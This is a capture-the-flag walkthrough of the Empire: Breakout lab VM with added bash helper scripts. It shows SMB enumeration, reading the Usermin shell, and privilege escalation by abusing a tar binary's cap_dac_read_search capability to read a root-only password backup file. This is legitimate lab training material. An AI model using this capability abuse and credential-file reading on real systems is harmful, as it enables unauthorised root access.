I Suck At CTFs: Empire - Breakout

Well - I suck at CTFs. Maybe I just don’t have the CTF mindset, but here’s to trying to do a challenge a day until I start to like it or can do them without a walkthrough =p

Start off with the typical nmap scan

The scan shows ports 80, 139, 445, 10000, and 20000 open; 10000 and 20000 are the default ports for Webmin and Usermin respectively, which matters later

(10000 and 20000 are not shown in the screenshot)

Go to the browser and head to http://IP (port 80)

Viewing the page source and scrolling down, we see this

Head to dcode.fr

Use its cipher identifier (the CIPHERTEXT TO RECOGNIZE box)

It reports high confidence that the text is Brainfuck (strictly an esoteric programming language rather than a cipher, but dcode's identifier lists it alongside the ciphers; the blob is a program that prints a string)

Running it gives us a password to use
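
The decode step as an added example that is not part of the original write-up: a small Brainfuck interpreter in bash, so a blob like this can be run offline instead of being pasted into dcode.fr. The function name bf_run and the program string SAMPLE_BF are constructed for this example (SAMPLE_BF just prints "Hi"); the real blob from the page source is not reproduced here.

```bash
#!/usr/bin/env bash
# Brainfuck interpreter in bash (added example, not from the write-up).
# Cells are 8-bit and wrap, the tape grows to the right as needed,
# and every character other than the eight commands is ignored.

bf_run() {
    local prog="$1"
    local -a tape=() jump=() stack=()
    local i ch depth=0 ptr=0 out="" n=${#prog}

    # Pass 1: pair each '[' with its ']' so loops can jump directly.
    for ((i = 0; i < n; i++)); do
        ch=${prog:i:1}
        if [ "$ch" = "[" ]; then
            stack[depth]=$i
            depth=$((depth + 1))
        elif [ "$ch" = "]" ]; then
            if [ "$depth" -eq 0 ]; then
                echo "bf_run: unmatched ']' at offset $i" >&2
                return 1
            fi
            depth=$((depth - 1))
            jump[i]=${stack[depth]}
            jump[${stack[depth]}]=$i
        fi
    done
    if [ "$depth" -ne 0 ]; then
        echo "bf_run: $depth unmatched '[' in program" >&2
        return 1
    fi

    # Pass 2: execute.
    for ((i = 0; i < n; i++)); do
        case "${prog:i:1}" in
            '>') ptr=$((ptr + 1)) ;;
            '<')
                ptr=$((ptr - 1))
                if [ "$ptr" -lt 0 ]; then
                    echo "bf_run: tape pointer moved left of cell 0 at offset $i" >&2
                    return 1
                fi
                ;;
            '+') tape[ptr]=$(( (${tape[ptr]:-0} + 1) % 256 )) ;;
            '-') tape[ptr]=$(( (${tape[ptr]:-0} + 255) % 256 )) ;;
            '.')
                # Append the cell's byte to the output (octal escape via printf).
                printf -v ch "\\$(printf '%03o' "${tape[ptr]:-0}")"
                out+=$ch
                ;;
            ',') tape[ptr]=0 ;;   # no input stream here: a read yields 0 (EOF)
            '[') if [ "${tape[ptr]:-0}" -eq 0 ]; then i=${jump[i]}; fi ;;
            ']') if [ "${tape[ptr]:-0}" -ne 0 ]; then i=${jump[i]}; fi ;;
        esac
    done
    printf '%s' "$out"
}

# Constructed sample program (not the blob from the page source): builds
# 8*9 = 72 ('H'), prints it, then adds 3*11 = 33 to reach 105 ('i').
SAMPLE_BF='++++++++[>+++++++++<-]>.<+++[>+++++++++++<-]>.'

bf_run "$SAMPLE_BF"
echo
```

To decode a real blob, save it to a file and run `bf_run "$(cat blob.bf)"`; anything that is not one of the eight Brainfuck commands is treated as a comment, so surrounding HTML comment markers do no harm.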

We don’t have a username yet, but remember that 139 and 445 (SMB) are open

Use enum4linux to enumerate Samba for a username

It finds a user named cyber

So now we have a username and a password

Hit IP:10000 (Webmin's default port) in the web browser

The username and password don’t work there

Head to IP:20000 (Usermin's default port)

The username and password work there!

Going through the menu we find Command Shell, from which we can cat user.txt

Searching msfconsole turns up a lot of different Webmin exploits

Tried all of them, and even with a username and password the exploits weren’t successful (I think?)

Back in the Command Shell on the VM, we find a copy of the tar binary in the cyber user's home directory

Using getcap we can see what capabilities that binary has been granted

getcap is a Linux command that lists the file capabilities assigned to binaries. Capabilities split root's privileges into discrete units, so a binary can be granted one specific privileged action (for example, bypassing file permission checks) without running as full root the way a SUID-root binary does.

🧭 Summary:

  • Command: getcap -r / 2>/dev/null

  • Purpose: Find binaries that may be used for privilege escalation without SUID

🔥 Interesting Capabilities for Privesc:

  • cap_dac_read_search

    • Read any file and search any directory, bypassing the usual permission checks; this is the capability that would let a tar binary read files its caller cannot

  • cap_net_raw

    • Send raw packets (what ping needs); usually harmless

  • cap_setuid

    • Call setuid(0) and become root outright

  • cap_sys_admin

    • Do almost anything (effectively root); dangerous if found
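
Triage of getcap output as an added example, not part of the original write-up: flag_caps reads `getcap -r / 2>/dev/null` output on stdin and prints only the binaries carrying a capability from the list above (plus a few close relatives such as cap_dac_override and cap_sys_ptrace). It handles both output formats getcap has used, `path = cap_x+ep` and `path cap_x=ep`. The function name and the SAMPLE_GETCAP lines, including the path /opt/example/tar, are constructed for this example and are not output from the target.

```bash
#!/usr/bin/env bash
# Triage "getcap -r / 2>/dev/null" output (added example, not from the write-up).
# Two getcap output formats exist, both handled here:
#   path = cap_net_raw+ep            (older libcap)
#   path cap_net_raw=ep              (newer libcap)
# Paths containing spaces are not handled (getcap -r / rarely hits any).

# Print "path<TAB>capability<TAB>why" for each interesting capability found on
# stdin. Returns 0 if anything was flagged, 1 otherwise.
flag_caps() {
    local line path caps cap why caplist found=1
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        path=${line%% *}                # everything up to the first space
        caps=${line#"$path"}            # the rest: " = cap..." or " cap..."
        caps=${caps#" = "}
        caps=${caps#" "}
        caps=${caps%%[+=]*}             # drop the +ep / =ep flag suffix
        IFS=, read -ra caplist <<< "$caps"   # cap_a,cap_b -> array
        for cap in "${caplist[@]}"; do
            case "$cap" in
                cap_dac_read_search) why="read any file, bypassing permission checks" ;;
                cap_dac_override)    why="read, write or execute any file" ;;
                cap_setuid)          why="setuid(0), direct root" ;;
                cap_setgid)          why="setgid to any group" ;;
                cap_sys_admin)       why="near-root, broad kernel admin" ;;
                cap_sys_ptrace)      why="attach to any process" ;;
                cap_sys_module)      why="load kernel modules" ;;
                cap_chown)           why="chown any file" ;;
                cap_net_raw)         why="raw sockets (ping); usually harmless" ;;
                *)                   continue ;;
            esac
            printf '%s\t%s\t%s\n' "$path" "$cap" "$why"
            found=0
        done
    done
    return $found
}

# Constructed sample mixing both output formats (not real scan output).
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/opt/example/tar = cap_dac_read_search+ep
/usr/bin/python3 cap_setuid=ep
/usr/sbin/arping cap_net_admin,cap_net_raw=ep
/usr/bin/unrelated cap_fowner=ep'

printf '%s\n' "$SAMPLE_GETCAP" | flag_caps
```

On a live box the call is `getcap -r / 2>/dev/null | flag_caps`; the stderr redirect hides the permission-denied noise from directories the current user cannot enter.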

Since the tar binary carries a capability that lets it read files the cyber user can't, CTF-ism says there has to be a file we need to read but can't

find /var/ -name ".*" 2>/dev/null turns up a hidden /var/backups/.old_pass.bak

Use the tar binary in cyber's home directory to read the .bak file

./tar -cf - /var/backups/.old_pass.bak | tar -xf -

./tar -c : the capability-bearing tar creates a tarball; this is where the protected file actually gets opened and read

-f - : -f names the archive file to write, and the hyphen means STDOUT rather than a file on disk

/var/backups/.old_pass.bak : the file we want to read

| tar -xf - : the stock tar reads the archive from STDIN (-f -) and extracts it (-x) into the current directory

tar strips the leading / from member names, so the copy is extracted with its full path under the current directory (./var/backups/.old_pass.bak), and because an unprivileged extract cannot chown, the copy is owned by cyber and readable

We can then cat ./var/backups/.old_pass.bak
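
The same tar pipe run on a scratch directory, as an added example that is not part of the original write-up, to show exactly where the copy lands and why it is readable afterwards. Both tars here are the stock binary and the source file is one we can already read, because granting cap_dac_read_search to a binary needs root (setcap); the function names tar_read_copy and demo_tar_trick, the scratch paths and the file contents are all constructed for the example.

```bash
#!/usr/bin/env bash
# "tar -cf - FILE | tar -xf -" on a scratch tree (added example, not from
# the write-up). On the target the left-hand tar is the copy in cyber's
# home that carries the capability; here it is plain tar, which is enough
# to show the path handling.

# Copy $1 out through a tar pipe into directory $2 and print the copy's path.
tar_read_copy() {
    local src="$1" dest="$2"
    mkdir -p "$dest"
    # Left: create (-c) an archive on stdout (-f -) containing $src; this is
    # the read that the capability makes possible on the target.
    # Right: stock tar extracts (-x) from stdin (-f -) under $dest (-C).
    # Both GNU and BSD tar drop the leading '/' from member names (GNU tar
    # says so on stderr), so /var/backups/x lands at $dest/var/backups/x.
    tar -cf - "$src" | tar -xf - -C "$dest"
    # An unprivileged extract cannot chown, so the copy belongs to whoever
    # ran tar, which is why it is readable even when the original was not.
    printf '%s/%s\n' "$dest" "${src#/}"
}

# Stand-alone demo on a scratch tree that mimics /var/backups/.old_pass.bak.
demo_tar_trick() {
    local scratch copy
    scratch=$(mktemp -d)
    mkdir -p "$scratch/var/backups"
    printf 'constructed-example-password\n' > "$scratch/var/backups/.old_pass.bak"
    copy=$(tar_read_copy "$scratch/var/backups/.old_pass.bak" "$scratch/out")
    echo "copy landed at: $copy"
    echo "contents: $(cat "$copy")"
    rm -rf "$scratch"
}

demo_tar_trick
```

Pass `-C /some/dir` to the extracting tar (as tar_read_copy does) when the current directory is not writable, and remember that the archive stream carries the file's original mode bits, so a file that was 0600 for root comes out 0600 for cyber, which is exactly what is wanted.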

Now we can use that password to log into 10000 as root

This is not shown, but we know the username is root because, reading /etc/passwd, root is the only other user with a login shell

We can then get to Command Shell

With the shell running as root we can read the r00t.txt file
